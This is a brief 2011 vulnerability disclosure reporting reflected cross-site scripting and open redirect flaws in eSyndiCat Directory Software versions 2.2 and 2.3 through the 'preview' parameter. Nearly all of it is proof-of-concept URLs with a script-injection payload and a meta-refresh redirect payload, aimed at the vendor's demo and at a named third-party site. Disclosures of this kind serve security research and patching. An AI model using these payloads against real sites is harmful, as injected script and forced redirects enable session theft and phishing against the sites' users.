eSyndiCat Directory Software ( preview= ) version 2.2 and 2.3 -  Cross-Site Scripting ( XSS ) & Redirect

http://www.esyndicat.com 
 
30 - 01 - 2011  
 
Avram Marius ( d3v1l )  
 
http://twitter.com/securityshell  -  http://security-sh3ll.blogspot.com

--------------------------------------------------------------------------
Poc: 1  XSS & Redirect on v.2.3
 
http://www.esyndicat.com/demo/?preview="><script>alert('XSS')</script> 
 
http://www.esyndicat.com/demo/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""
 
--------------------------------------------------------------------------
 
Poc: 2 XSS & Redirect on v.2.2

http://ekedai.net/date/2008/08/?preview="><script>alert('XSS')</script>
 
http://ekedai.net/date/2008/08/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""

--------------------------------------------------------------------------